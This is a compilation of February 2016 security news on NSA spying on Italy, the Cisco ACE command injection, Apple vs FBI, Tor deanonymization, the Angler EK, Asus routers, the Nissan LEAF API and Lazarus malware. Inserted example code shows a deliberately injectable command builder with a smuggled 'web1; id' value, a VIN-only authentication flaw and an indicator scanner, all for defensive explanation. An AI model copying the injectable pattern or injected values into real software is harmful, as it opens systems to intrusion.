According to the documents leaked by Assange's organization, the NSA targeted all the members of Silvio Berlusconi's staff, including his personal advisor Valentino Valentini, Berlusconi's National Security Advisor Bruno Archi, Marco Carnelos, and the Permanent Representative of Italy to NATO, Stefano Stefanini.
In October 2011, the NSA also intercepted one of Valentino Valentini's top-secret/Noforn documents.
The documents confirm that US intelligence also intercepted a critical private meeting between then French president Nicolas Sarkozy, Merkel and Berlusconi, where Sarkozy described the Italian banking system as ready to “pop like a cork.”
Which is the position of the Italian Government?
Many Italian security experts, myself included, are not surprised by these revelations; from the institutional perspective, it seems that the current Italian Government is ignoring these serious facts.
“The current Italian PM, Matteo Renzi, has essentially ignored the case, whereas the former Italian PM, Enrico Letta, speaking to the Chamber of Deputies in the midst of the most heated phases of the Nsa scandal, declared: «Based on the analysis conducted by our intelligence services and our international contacts, we are not aware that the security of the communications of the Italian government and embassies has been compromised, nor are we aware that the privacy of Italian citizens has been compromised».” continues L'Espresso.
The Italian government has summoned the American ambassador to Rome following the embarrassing revelations.
The document disclosed by Wikileaks also revealed other operations conducted by the US Intelligence, including the interception of the top EU and Japanese trade ministers.
“Today we proved the UN Secretary General Ban Ki-Moon’s private meetings over how to save the planet from climate change were bugged by a country intent on protecting its largest oil companies. Back in 2010 we revealed that the then US Secretary of State Hillary Clinton had ordered her diplomats to steal the UN leadership’s biometric data and other information. The US government has signed agreements with the UN that it will not engage in such conduct. It will be interesting to see the UN’s reaction, because if the United Nations Secretary General, whose communications and person have legal inviolability, can be repeatedly attacked without consequence then everyone is at risk.” said WikiLeaks editor Julian Assange.
Cisco fixes Command Injection vulnerability in CISCO ACE 4710 products
26.2.2016 Vulnerebility
Cisco has released security updates for the Cisco ACE 4710 appliance to fix a high severity command injection vulnerability.
This week Cisco published a security advisory related to a command injection vulnerability (CVE-2016-1297) affecting its Cisco ACE 4710 Application Control Engine. The vulnerability was reported to the company by Jan Kadijk, an expert at Warpnet BV.
The Cisco ACE 4710 Application Control Engine is a protection solution designed to enhance application availability and performance and to improve resilience to cyber attacks.
The Cisco ACE 4710 Device Manager GUI doesn't correctly validate user input, exposing users to remote attack: an authenticated attacker could execute any command-line interface command with administrator privileges. The Cisco ACE 4710 Application Control Engine is being phased out; Cisco stopped selling the solution in January 2014, but is supporting it until January 31, 2019.
“A vulnerability in the Device Manager GUI of the Cisco ACE 4710 Application Control Engine could allow an authenticated, remote attacker to execute any command-line interface (CLI) command on the ACE with admin user privileges. ” states the CISCO advisory.
“The vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by crafting a malicious HTTP POST request with injected CLI commands inside the value of a POST parameter value. An exploit could allow the attacker to bypass the role-based access control (RBAC) restrictions enforced by the Cisco ACE Device Manager GUI.”
Exploitation of the vulnerability is quite simple: the attacker needs to send a specially crafted HTTP POST request with commands injected into the value of a POST parameter.
Cisco stated that the security flaw affects Cisco ACE 4710 appliances running A5 software versions up to A5(3.0) with access to the Device Manager GUI enabled.
The company has already released security patches and suggested disabling the Device Manager GUI as a workaround.
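To make the advisory's description concrete, here is an added example (not Cisco's code and not the ACE's real interface): a hypothetical management handler that turns a POST parameter into a CLI command, shown both in the unsafe form the advisory describes and in a hardened form that validates the value against an allowlist and never hands it to a shell. The command name `ace-cli`, the `verb` and `rserver` parameters, and the allowlist are all assumptions.

```python
"""Added example (not Cisco's code): a minimal model of the bug class in the
ACE 4710 advisory. A management GUI takes a POST parameter and turns it into
a CLI command. The vulnerable builder splices the raw value into a shell
command line; the hardened builder validates against an allowlist and
returns an argv list so no shell ever interprets the value.
All CLI and parameter names here are hypothetical."""
import re
from urllib.parse import parse_qs

# Hypothetical allowlist of CLI verbs the GUI is permitted to issue.
ALLOWED_VERBS = {"show", "clear"}
# Hypothetical object-name rule: letters, digits, dash, underscore, dot only.
NAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,64}$")
# Shell operators that chain a second command onto the first.
CHAIN_RE = re.compile(r"\s*(?:;|&&|\|\||\|)\s*")


class RejectedInput(ValueError):
    """Raised when a POST parameter fails validation."""


def parse_post_body(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into single values."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def build_command_vulnerable(params: dict) -> str:
    """Vulnerable: concatenates the raw parameter into a shell command line.
    Any shell operator inside the value becomes part of the command."""
    return f"ace-cli show rserver {params.get('rserver', '')}"


def build_command_hardened(params: dict) -> list:
    """Hardened: allowlist-validate each field and return an argv list, so the
    value is always exactly one argument and is never parsed by a shell."""
    verb = params.get("verb", "")
    name = params.get("rserver", "")
    if verb not in ALLOWED_VERBS:
        raise RejectedInput(f"verb not permitted: {verb!r}")
    if not NAME_RE.match(name):
        raise RejectedInput(f"rserver name failed validation: {name!r}")
    return ["ace-cli", verb, "rserver", name]


def is_rejected(params: dict) -> bool:
    """True when the hardened builder refuses the request."""
    try:
        build_command_hardened(params)
    except RejectedInput:
        return True
    return False


def injected_commands(command_line: str) -> list:
    """Dry-run analysis (nothing is executed): split a shell command line on
    chaining operators and return every command after the intended one.
    An empty list means the value could not smuggle in extra commands."""
    parts = [p for p in CHAIN_RE.split(command_line) if p]
    return parts[1:]


if __name__ == "__main__":
    # Constructed sample bodies: a legitimate lookup and a tampered one
    # whose rserver value is "web1; id" once URL-decoded.
    for body in ("verb=show&rserver=web1", "verb=show&rserver=web1%3B+id"):
        params = parse_post_body(body)
        unsafe = build_command_vulnerable(params)
        print(body, "->", unsafe, "| extra:", injected_commands(unsafe),
              "| hardened rejects:", is_rejected(params))
```

The vulnerable builder is shown only to make the defect visible to a reviewer; the hardened builder is the pattern the GUI should have used, with the RBAC check kept separate from input parsing.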
Cisco confirmed that there is no evidence the flaw has been exploited in the wild.
Cisco has recently issued security advisories for vulnerabilities rated critical and high severity; among the flawed products are the Industrial Ethernet 2000 Series devices and Cisco ASA firewalls.
The new iPhone designed by Apple will be unhackable
26.2.2016 Apple
Apple has begun developing security features for the new iPhone to make it impossible for law enforcement agencies to break into a locked iPhone.
The news of the FBI's request that Apple unlock the iPhone of Syed Farook, one of the San Bernardino shooters, has raised a debate on the effectiveness of the encryption measures implemented to protect users' privacy.
Apple’s CEO was categorical on the subject:
“The only way to get information — at least currently, the only way we know — would be to write a piece of software that we view as sort of the equivalent of cancer. We think it’s bad news to write. We would never write it,” Tim Cook explained in the interview.
While the US Government is urging the company to implement a mechanism that would give law enforcement access to mobile devices during investigations of suspects, Apple is working on a new iPhone that will be unhackable even by the company's own experts.
According to the New York Times, Apple is studying new security features that will not allow hacking techniques to bypass the passcode protecting the iPhone and iPad.
“Apple engineers have begun developing new security measures that would make it impossible for the government to break into a locked iPhone using methods similar to those now at the center of a court fight in California, according to people close to the company and security experts.” states a blog post published on the NYT.
The new iPhone will not allow law enforcement and intelligence agencies to bypass security measures implemented by Apple.
The US authorities have requested that Apple unlock 12 more iPhone devices, and if Apple agrees to one request, there is a concrete risk that a huge number of similar requests will follow.
Clearly Apple is also trying to benefit from the story: by refusing the FBI's request, it reinforces its privacy image with its customers.
“For all of those people who want to have a voice but they’re afraid, we are standing up, and we are standing up for our customers because protecting them we view as our job,” added Tim Cook in an interview with ABC News.
The DoD funded the Carnegie Mellon University’s research on Tor Hacking
26.2.2016 Hacking
A judge has confirmed that the US Department of Defense funded Carnegie Mellon University to conduct research on hacking Tor.
In November 2015, the researchers at the Tor Project publicly accused the FBI of paying the experts at the Carnegie Mellon University to deanonymize Tor users.
The experts at the Tor Project collected information about the attack technique developed in 2014 by Carnegie Mellon researchers against the popular anonymizing system.
In January 2014, the attackers introduced more than 100 Tor relays in an attempt to deanonymize suspects. Fortunately, the Tor Project removed them from the network in July 2014.
The Director of the Tor Project, Roger Dingledine, accused the FBI of commissioning a study from the Carnegie Mellon boffins on methods to de-anonymize Tor users. The FBI paid at least $1 million to track Tor users and reveal their IP addresses as part of a large criminal investigation.
“Apparently these researchers were paid by the FBI to attack hidden services users in a broad sweep, and then sift through their data to find people whom they could accuse of crimes. We publicized the attack last year, along with the steps we took to slow down or stop such an attack in the future:
https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack/
Here is the link to their (since withdrawn) submission to the Black Hat conference:
https://web.archive.org/web/20140705114447/http://blackhat.com/us-14/briefings.html#you-dont-have-to-be-the-nsa-to-break-tor-deanonymizing-users-on-a-budget
along with Ed Felten’s analysis at the time:
https://freedom-to-tinker.com/blog/felten/why-were-cert-researchers-attacking-tor/
We have been told that the payment to CMU was at least $1 million.” reads a blog post published by the Tor Project.
The FBI paid at least $1 million to the researchers to find a way to de-anonymize users under investigation by law enforcement.
The research was funded by the Department of Defense (DoD) and the FBI obtained the information on alleged criminals after serving a subpoena to Carnegie Mellon’s Software Engineering Institute (SEI).
This means that the SEI research was funded by the DoD and not by the FBI.
Court documents confirmed that the experts at Carnegie Mellon University had helped law enforcement de-anonymize suspects.
Evidence of the collaboration between the FBI and Carnegie Mellon University also emerged in a trial in federal court in Seattle in November 2015. The court was hearing the case of Brian Farrell, an alleged Silk Road 2 lieutenant, under investigation by law enforcement, which had identified IP addresses belonging to the suspect. A new filing in Farrell's case states that a “university-based research institute” supported the investigation and helped the feds de-anonymize Farrell.
According to a Homeland Security search warrant, between January 2014 and July 2014 a “source of information” provided law enforcement “with particular IP addresses” that had accessed the vendor side of Silk Road 2.
Farrell's lawyers filed a motion asking the prosecution to provide further information on the involvement of the Carnegie Mellon researchers in the investigation and on the hacking technique used to de-anonymize suspects.
The response of the federal judge was negative: the magistrate denied the motion this week, explaining that the authorities had not violated Fourth Amendment rights by identifying the suspects via their IP addresses.
“SEI’s identification of the defendant’s IP address because of his use of the Tor network did not constitute a search subject to Fourth Amendment scrutiny.”
The judge confirmed that the suspects were identified by exploiting security vulnerabilities in the Tor network.
Carnegie Mellon University has always denied having received money for its research.
Apple is working on New iPhone Even It Can't Hack
25.2.2016 Apple
Amid an ongoing dispute with the United States government over a court order to unlock iPhone 5C of one of the San Bernardino shooters Syed Farook…
...Apple has started working on implementing stronger security measures, "even it can't hack," to make its future iPhones unhackable.
The Federal Bureau of Investigation (FBI) is deliberately forcing Apple to create a special, backdoored version of iOS that would let it brute force the passcode on Farook's iPhone without erasing the data.
However, the FBI approached the company to unlock the shooter's iPhone 5C in various ways like:
Create a backdoor to shooter's iPhone.
Disable the Auto-destruct feature after numerous tries.
Increase the brute force time to try out all combinations.
Minimize the time of waiting for a window after each try.
...and much more
Apple is still fighting the battle even after clearly telling the court that it will not provide the agency any backdoor access that would affect its users' privacy and security.
New iPhones will be Unhackable
Apple has made this sensitive issue a top priority, aiming to protect the public's privacy and security by closing any existing way in (if any).
According to the New York Times, Apple is working on new security measures that would prevent governments or federal law enforcement from using passcode bypassing techniques to access iPhones or any iOS devices in the future.
This breakthrough would ensure that upcoming Apple products are not susceptible to such techniques by any means.
In short, the main highlight of this move is that even Apple would not be able to access its customers' data, whether for a criminal identification demand from the FBI or for a government spying agency like the NSA.
In San Bernardino shooter's case, Apple helped the FBI in every possible way by providing iCloud Backup of Farook and suggesting other alternative ways to view his iPhone data.
But, Apple refused to the FBI Request and Californian Judge demands for the backdoor creation in order to pull out the terrorist data from iPhone 5C.
"The only way we know would be to write a piece of software that we view as sort of the software equivalent of cancer. We think it's bad news to write. We would never write it. We have never written it," stated Apple CEO Tim Cook in an interview.
Government wants Apple to Unlock 12 More iPhones
Cook's statement carries an implicit admission that the company could write a piece of software specifically for this device to make a breakthrough in Farook's case.
But if Apple agrees to one request, the company would soon be flooded with FBI and CIA requests to unlock more iPhones belonging to criminals.
The recent request by the United States government to unlock 12 more iPhones is just the start of that scenario.
Tech giants like Google, Facebook, and WhatsApp have backed Apple's decision on user privacy, but politicians like presidential candidate Donald Trump have criticized it, with Trump making a controversial call to "Boycott Apple" on Twitter.
The FBI's repeated requests, the battles on social media and the wider controversy have made Apple rethink the security of its future products. And since the company does not want to fly in the face of danger, it has decided to bolster the security of its forthcoming iPhone releases.
Authors of the Angler EK recently integrated a Silverlight exploit
25.2.2016 Exploit
The security researcher Kafeine confirmed that the authors of the Angler EK have integrated an exploit for a recently patched Microsoft Silverlight vulnerability.
Ransomware is becoming one of the most dreaded cyber threats for netizens; security experts have noticed a surge in the number of cyber attacks aimed at spreading malware like Cryptowall and TeslaCrypt. Exploit kits like the Nuclear EK and the Angler EK are the preferred vectors for serving this family of malware, and cyber criminals constantly improve their code in order to compromise the largest possible number of victims.
The security expert Kafeine has recently discovered that the authors of the Angler EK have added the code of a Silverlight exploit leveraging the CVE-2016-0034 vulnerability.
The flaw was fixed by Microsoft in January with the MS16-006 critical bulletin; an attacker can exploit it for remote code execution. The Silverlight flaw was discovered by experts at Kaspersky Lab as a result of an investigation into the Hacking Team arsenal disclosed in July 2015.
According to Microsoft, the remote code execution vulnerability can be exploited by an attacker who sets up a website hosting a specially crafted Silverlight application.
When users visit the bogus website, the exploit allows the attacker to obtain the same permissions as the victim.
On February 18, 2016, Kafeine noticed that the authors behind Angler had added code for the Silverlight exploit; according to the expert, the integration was completed on February 22.
Anton Ivanov, a senior malware researcher at Kaspersky, confirmed that an exploit for the Silverlight vulnerability has been integrated into the Angler EK.
Kafeine explained that the CVE-2016-0034 exploit has been used to spread a variant of the TeslaCrypt ransomware; the attack works only against Silverlight versions prior to the current one, Silverlight 5.1.41212.0.
Angler EK dropping TeslaCrypt via Silverlight 5.1.41105.0 after the "EITest" redirect, 2016-02-22 (Kafeine blog post)
The experts at Ars Technica who analyzed the Hacking Team's leaked emails noticed communications between a Russian developer named Vitaliy Toropov and the staff of the Hacking Team.
The man sold an Adobe Flash Player exploit to the Hacking Team for $45,000 in 2013 and also offered a Silverlight exploit.
“Now your discount on the next buy is -5k and -10k is for a third bug. I recommend you the fresh 0day for iOS 7/OS X Safari or my old Silverlight exploit which was written 2.5 years ago and has all chances to survive further in next years as well. ” Toropov wrote to Hacking Team member Giancarlo Russo.
Experts at Kaspersky started analyzing Toropov's exploits, including a Microsoft Silverlight Invalid Typecast / Memory Disclosure exploit dating back to 2013 that he had published.
Kaspersky issued a YARA rule to detect the exploit in the wild, and on November 25th the company detected Toropov's exploit on a user's machine. Later another sample of the exploit was uploaded from Laos to a multiscanner service.
“After implementing the detection, we waited, hoping that an APT group would use it. Since Vitaliy Toropov was offering it to Hacking Team, we also assumed that he sold it to other buyers, and what good is a zero-day if you don’t use it? Unfortunately, for several months, nothing happened. We had already forgotten about this until late November 2015.” Kaspersky researchers wrote in a blog post. “On November 25th, one of our generic detections for Toropov’s 2013 Silverlight exploit triggered for one of our users. Hours later, a sample was also uploaded to a multiscanner service from Lao People’s Democratic Republic (Laos).”
The analysis of the exploit revealed that it was compiled on July 21, 2015, after the Hacking Team data was leaked online. Kaspersky immediately reported the exploit to Microsoft.
It's unclear whether this Silverlight exploit is the same one Toropov offered in 2013:
“One of the biggest questions we have is whether this is Vitaliy Toropov’s Silverlight zero-day which he tried to sell to Hacking Team. Or is it a different one? Several things make us think it’s one of his exploits, such as the custom error strings. Of course, there is no way to be sure and there might be several Silverlight exploits out there. One thing is for sure though – the world is a bit safer with the discovery and patching of this one.” wrote Kaspersky researchers.
Judge Confirms Government Paid CMU Scientists to Hack Tor Users for FBI
25.2.2016 Hacking
Everything is now crystal clear:
Security researchers from Carnegie Mellon University (CMU) were hired by federal officials to develop a technique that could help the FBI unmask Tor users and reveal their IP addresses as part of a criminal investigation.
Yes, a federal judge in Washington has recently confirmed that the computer scientists at CMU's Software Engineering Institute (SEI) were indeed behind a 2014 hack of the Tor network, according to court documents [PDF] filed Tuesday.
In November 2015, The Hacker News reported that Tor Project Director Roger Dingledine accused the Federal Bureau of Investigation (FBI) of paying CMU at least $1 million for providing information that led to the identification of criminal suspects on the Dark Web.
After this news had broken, the FBI denied the claims, saying "The allegation that we paid [CMU] $1 Million to hack into TOR is inaccurate."
Meanwhile, the CMU also published a press release, saying the university had been subpoenaed for the IP addresses it obtained during its research.
The revelation came out as part of the ongoing case against Brian Richard Farrell, an alleged Silk Road 2 lieutenant who was arrested in January 2014. It has emerged that federal officials recruited a "university-based research institute" that was running systems on the Tor network to help authorities uncover Farrell's identity.
University Researchers Helped FBI Hack TOR
Now, a recent filing in one of the affected criminal cases has confirmed both the name of the "university-based research institute" and the existence of a subpoena.
Some earlier allegations by the Tor Project seem to be wrong: the research was funded by the Department of Defense, which was later subpoenaed by the FBI.
Here's what the Tuesday court order by US District Judge Richard Jones, filed in the Farrell case, reads:
"The record demonstrates that the defendant's IP address was identified by the Software Engineering Institute (SEI) of Carnegie Mellon University (CMU) when SEI was conducting research on the Tor network which was funded by the Department of Defense (DOD)."
"Farrell's IP address was observed when SEI was operating its computers on the Tor network. This information was obtained by law enforcement pursuant to a subpoena served on SEI-CMU."
Farrell is charged with conspiracy to distribute drugs like cocaine, heroin, and methamphetamine through the Silk Road 2.0 dark web marketplace.
$1.73 Billion to UnMask TOR Users?
Last summer, the DoD renewed a contract worth over $1.73 billion with the SEI, which, according to CMU, is the only federally funded research center that focuses on "software-related security and engineering issues."
Carnegie Mellon University's SEI came under suspicion for the Tor hack due to the sudden cancellation of a talk by SEI researchers Michael McCord and Alexander Volynkin on de-anonymizing Tor users at the Black Hat 2014 hacking conference.
More details on the matter are still unclear, but the judge confirmed a few facts about Tor and stated that "Tor users clearly lack a reasonable expectation of privacy in their IP addresses while using the Tor network."
Asus Faces 20 years of Audits Over Poor Wi-Fi Router Security
25.2.2016 Safety
Asus is currently in a troublesome situation after the US Federal Trade Commission (FTC) filed a complaint over the insecurity of its routers.
On Tuesday, the FTC settled charges with Asus, with the hardware manufacturer agreeing to:
Undergo independent security audits once every two years for the next two decades.
This action was taken as a result of security negligence in Asus wireless routers that put the home and corporate networks of hundreds of thousands of consumers at risk.
If Asus is found to violate the agreement, the company could end up paying a civil penalty of up to $16,000 for each violation.
Asus Router Security Blunders
Since Asus markets its products through its website as secure and intelligent routers, the following flaws undercut that claimed level of security and intelligence.
1. Default Username & Password: ADMIN
In 2014, a serious security issue was brought to public attention regarding the default password of Asus products. It was discovered that Asus had been shipping its routers with both the username and password fields preset to a default value.
Even a script kiddie with these predictable credentials could gain unauthorized access to a router and break into the victim's network. In 2014, many Asus routers were compromised in exactly this manner.
Additionally, Asus did not bother to notify its customers to change the default usernames and passwords in order to maintain the security and privacy of their networks.
2. Easily Hackable Router Admin Panel
During the investigation, the FTC found that nearly all the security measures taken by Asus could be bypassed.
One prevalent vulnerability allowed attackers to reach the admin panel and disable the security settings via the web interface.
3. Asus AiCloud & AiDisk Vulnerable to Remote Hacking
"Security Negligence" episodes of Asus are not yet over.
The cloud services offered by Asus, AiCloud and AiDisk, also suffered from critical vulnerabilities that allowed an attacker to access the attached hard disk remotely from anywhere in the world, resulting in complete system compromise.
AiCloud lets customers browse files "in the cloud", effectively turning the router into a mini-cloud once a USB hard drive is plugged into it.
Man-in-the-Middle (MITM) attacks were easy to carry out because the login details were transmitted unencrypted.
The issue was reported back in January 2014, but ASUS did not advise its users to upgrade their firmware after patching the vulnerability, a clear case of negligence.
4. 'Check for Upgrades' is an Illusion
Regular updates usually kill vulnerabilities. But it is different in the case of Asus.
According to the reports, the FTC found that the button named "Check for Upgrades" was just a dummy with no real function behind it.
It is believed that the administrators did not import the latest patches into the upgrade database, which is pushed to users whenever a user checks for notifications.
In short, hackers could freely tamper with the security features of any Asus router after walking straight in through the sloppy admin policies of Asus routers.
The FTC isn't just unhappy about ASUS's bogus security claims, but it’s also unhappy with the company's response time.
All the complaints, in a nutshell, are enough to show the laxity of the security measures taken by Asus.
Internet of Things (IoT) Devices at Risk
This situation of illusory security becomes even worse when Internet of Things (IoT) devices are compromised. Since routers are the gateway to IoT devices, an attacker could easily send arbitrary commands to those devices.
Jessica Rich, Director of the FTC's Bureau of Consumer Protection, says:
"The Internet of Things is growing by leaps and bounds, with millions of consumers connecting smart devices to their home networks. Routers play a key role in securing those home networks, so it's critical that companies like ASUS put reasonable security in place to protect consumers and their personal information"
Asus has been given a very clear path to follow: to notify users whenever an update is available and to provide appropriate instructions to protect them.
The disclosure of these basic vulnerabilities should be an eye-opener for other router vendors to tighten up their own security as well as their customers'.
The weaknesses described above in ASUS products came into the limelight in 2014, but a month later, 300,000 home and mini routers manufactured by D-Link, Micronet, Tenda, TP-Link, and others had been compromised by the same methods.
Remotely hacking a Nissan LEAF via vulnerable APIs
25.2.2016 Hacking
The security expert Troy Hunt discovered that it is possible to remotely control features of a Nissan Leaf via API.
The popular security expert Troy Hunt discovered a security vulnerability affecting the API implemented by Nissan to manage LEAF cars from a mobile device. Other experts have confirmed the existence of the flaw; the vulnerability had been discussed publicly on a French-language forum since December.
The vulnerability could be exploited by hackers to remotely manage some features of the popular electric car.
Nissan provided both Android and iOS applications to remotely manage the vehicle from a mobile device.
Hunt was at a workshop held in Norway when one of his students, who owned a Nissan LEAF, reported that the iOS app was using only the Vehicle Identification Number (VIN) to authenticate users. Knowledge of a Nissan LEAF's VIN could allow attackers to control the air conditioning and access driving data, including power consumption and travel distance.
The analysis of the API revealed that it could be accessed without any kind of authentication.
Hunt conducted a series of tests with the support of the researcher Scott Helme that demonstrated how to take control of the vehicle remotely. An attacker could exploit the flaw to turn on the AC of a parked car, draining its battery, but the Australian expert confirmed that it is not possible to remotely control the engine or to lock or unlock the vehicle.
How to obtain a target’s VIN?
Hunt explained that all the Nissan LEAF vehicles he analyzed have the same VIN, except for the last five digits. An attacker can try all possible combinations of these digits to send commands to the vehicle.
Hunt reported the issue to Nissan on January 23, but the vulnerability is still unpatched. Pending a fix, users can disable the service from the configuration menu.
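The root cause here is an endpoint that treats a guessable identifier (the VIN) as proof of identity, with no separate authentication step and no ownership check. The following added example, which is not Nissan's code or API, puts the flawed pattern beside a hardened handler: the caller must present a valid session token, the VIN must belong to that account, and unknown and unowned VINs get the same answer so the endpoint cannot confirm which VINs exist. A small server-side check for clients touching many distinct VINs is included as the detection counterpart. The VINs, session tokens, request dictionaries, log entries and the `send_climate_command` stub are all constructed for the example.

```python
"""VIN-only "authentication" beside a hardened version of the same endpoint.

Added example, not Nissan's code or API: the VINs, session tokens, request
dictionaries and the send_climate_command stub are all constructed here.
"""
from collections import defaultdict

# Constructed ownership records: each VIN belongs to exactly one account.
OWNERS = {"VIN-EXAMPLE-00001": "alice", "VIN-EXAMPLE-00002": "bob"}
# Constructed login sessions: token -> account, as issued by a real login step.
SESSIONS = {"session-token-alice": "alice"}


def send_climate_command(vin: str, action: str) -> dict:
    """Stand-in for the back end that actually talks to the car."""
    return {"status": 200, "vin": vin, "action": action}


def vulnerable_climate(request: dict) -> dict:
    """The flaw as described: whoever supplies a known VIN is treated as its owner."""
    vin = request.get("vin")
    if vin in OWNERS:
        return send_climate_command(vin, request.get("action", "status"))
    return {"status": 404, "error": "unknown vehicle"}


def hardened_climate(request: dict) -> dict:
    """Authenticate the caller first, then authorize the caller for this VIN."""
    account = SESSIONS.get(request.get("token", ""))
    if account is None:
        return {"status": 401, "error": "login required"}
    vin = request.get("vin")
    # Same answer for "no such VIN" and "not your VIN", so the endpoint cannot be
    # used as an oracle to learn which VINs exist.
    if OWNERS.get(vin) != account:
        return {"status": 404, "error": "unknown vehicle"}
    return send_climate_command(vin, request.get("action", "status"))


def clients_probing_many_vins(access_log: list, threshold: int = 5) -> list:
    """Server-side check: clients that touched more distinct VINs than an owner plausibly has."""
    seen = defaultdict(set)
    for entry in access_log:
        seen[entry["client"]].add(entry["vin"])
    return sorted(client for client, vins in seen.items() if len(vins) >= threshold)


# Constructed access log: one normal owner and one client walking through VINs.
SAMPLE_LOG = [{"client": "198.51.100.10", "vin": "VIN-EXAMPLE-00001"}] + [
    {"client": "203.0.113.7", "vin": f"VIN-EXAMPLE-{n:05d}"} for n in range(1, 7)
]

if __name__ == "__main__":
    print(vulnerable_climate({"vin": "VIN-EXAMPLE-00001", "action": "ac_on"}))
    print(hardened_climate({"vin": "VIN-EXAMPLE-00001", "action": "ac_on"}))
    print(hardened_climate({"token": "session-token-alice", "vin": "VIN-EXAMPLE-00001",
                            "action": "ac_on"}))
    print(clients_probing_many_vins(SAMPLE_LOG))
```

The 404-for-everything-not-yours choice is deliberate: returning 403 for someone else's VIN would tell a caller that the VIN is real, which is the one thing the hardened endpoint should not leak.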
Operation Blockbuster revealed the Lazarus Group Activities
25.2.2016 Hacking
The Operation BlockBuster Coalition has disclosed the results of its investigation on the activities of the Lazarus Group that is believed to be behind the Sony Pictures hack.
The state-sponsored hackers allegedly behind the Sony Pictures hack have been linked to other security breaches suffered by a number of companies in South Korea.
The FBI blamed North Korea; the Bureau released the findings of its investigation, which indicated the involvement of the Pyongyang government in the Sony hack.
“As a result of our investigation, and in close collaboration with other US Government departments and agencies, the FBI now has enough information to conclude that the North Korean government is responsible for these actions,” the FBI said Friday in a statement.
US law enforcement suspects the involvement of North Korea's Unit 121, a group of hackers working under the direction of the General Bureau of Reconnaissance.
Experts at Kaspersky have linked the group to the hacking operations Dark Seoul and Operation Troy. According to Kaspersky the hacking crew has been active since at least 2009 and is still operating undercover.
Kaspersky Lab, alongside a number of security firms including Novetta, AlienVault, Invincea, ThreatConnect, Volexity, Symantec, and PunchCyber, has published reports on the activities of the Lazarus Group.
The group of security firms formed an alliance called Operation Blockbuster, which issued detection signatures to neutralize the hacking tools used by the APT.
The Lazarus Group's arsenal includes the Destover wiper malware, the same used against the systems of Sony Pictures Entertainment.
“The group deployed multiple malware families throughout the years, including malware associated with Operation Troy and DarkSeoul, the Hangman malware (2014-2015) and Wild Positron / Duuzer (2015). The group is known for spearphishing attacks, which include CVE-2015-6585, which was a zero-day vulnerability at the time of discovery.” states a report published on SecureList.
Researchers at Kaspersky Lab revealed that the Lazarus Group’s malware is mostly custom-tailored and appears highly sophisticated.
The activity of the Lazarus Group surged in 2014 and 2015; the experts of the firms composing the Operation Blockbuster team noticed a number of similarities across attacks worldwide.
The researchers discovered that malware used in the attacks linked to the Lazarus Group reused several components, including at least six user-agents.
“Studying multiple coding quirks within any given malware variant actually revealed these to be coding conventions implemented across both different malware families as well as entirely new samples. A simple example of code reuse is the networking functionality that includes a half-dozen hard-coded user-agents with the misspelling ‘Mozillar’ instead of Mozilla.” states the post.
The experts also noticed other similarities in the modus operandi of the threat actors, such as the use of BAT files to delete malware components after infection and password reuse in the malware droppers.
“These BAT files are generated on the fly and, while they serve their purpose of eliminating initial infection traces, they ironically double as a great way to identify the malware itself by honing in on the path-placeholder strings that generate the randomly-named BAT files on the infected systems,” Kaspersky Lab said in its report. “A high-confidence indicator of correlation is the reuse of a shared password across malware droppers used to drop different malware variants. The droppers all kept their payloads within a password-protected ZIP under the resource name ‘MYRES’. The dropper contains the hardcoded password ‘!1234567890 dghtdhtrhgfjnui$%^^&fdt‘ making it trivially easy for an analyst to reach the payload. “
The researchers confirmed that the group is still active and is currently working on new weapons to add to its arsenal.
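The quoted report makes the point that coding quirks reused across families (the 'Mozillar' user-agent misspelling, the 'MYRES' ZIP resource, the shared dropper password) are themselves useful detection handles. The following added example turns exactly those three quoted strings into a minimal byte-string scanner; it is not an Operation Blockbuster signature or Kaspersky's YARA rule, and the three sample blobs it scans are constructed for the example.

```python
"""String-indicator scan for the Lazarus code-reuse quirks quoted above.

Added example; it is not an Operation Blockbuster signature or Kaspersky's
YARA rule. The three indicators come from the report text quoted in this
article; the sample byte strings are constructed here.
"""

# Indicators taken from the quoted report; matching is exact and case-sensitive.
INDICATORS = {
    "misspelled_user_agent": b"Mozillar",                               # 'Mozillar' instead of Mozilla
    "dropper_zip_resource":  b"MYRES",                                  # resource name of the payload ZIP
    "dropper_zip_password":  b"!1234567890 dghtdhtrhgfjnui$%^^&fdt",    # shared dropper password
}


def scan_sample(data: bytes) -> list:
    """Return the names of every indicator present in the byte string, in table order."""
    return [name for name, needle in INDICATORS.items() if needle in data]


def scan_samples(samples: dict) -> dict:
    """Scan a {label: bytes} collection and keep only samples with at least one hit."""
    hits = {label: scan_sample(data) for label, data in samples.items()}
    return {label: names for label, names in hits.items() if names}


# Constructed samples: a benign request and two blobs mimicking the quirks.
SAMPLES = {
    "benign.bin": b"GET / HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1)\r\n\r\n",
    "implant.bin": b"\x00User-Agent: Mozillar/5.0 (compatible; MSIE 8.0)\x00",
    "dropper.bin": b"\x00MYRES\x00\x00!1234567890 dghtdhtrhgfjnui$%^^&fdt\x00",
}

if __name__ == "__main__":
    for label, names in scan_samples(SAMPLES).items():
        print(f"{label}: {', '.join(names)}")
```

Because the search for `Mozillar` is a plain substring match, a correctly spelled `Mozilla/5.0` never fires; the misspelling is what carries the signal, which is the point the report makes about such quirks.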
Just One Device? No, Government wants Apple to Unlock 12 More iPhones
24.2.2016 Apple
Until now, the FBI has been asking for Apple's help in unlocking the iPhone belonging to one of the terrorists in the San Bernardino shootings, which killed 14 and injured 24 in December.
However, in addition to the iPhone 5C that belonged to San Bernardino shooter Syed Farook, the U.S. Justice Department is seeking court orders forcing Apple to help officials unlock at least 12 more iPhones.
Citing sources, the Wall Street Journal reported that federal authorities want to extract data from iPhones seized in a variety of criminal investigations; these are undisclosed cases in which prosecutors are seeking to compel Apple to help them bypass the iPhone's lock screen.
Although further details of these cases have not been publicly disclosed, these dozen or so cases are all distinct from the San Bernardino shooter's case and involve many iPhones running an older iOS version that has fewer security barriers to bypass.
However, Apple is fighting the government's demands in all these cases and, in a number of them, has objected to the US Justice Department's efforts to compel the company through an 18th-century law, the All Writs Act, under which courts can require actions to comply with their orders.
Bill Gates wants Apple to Help the FBI
Apple's refusal to unlock iPhone linked to one of the San Bernardino shooters has escalated a battle between the technology company and the U.S. Federal Bureau of Investigation.
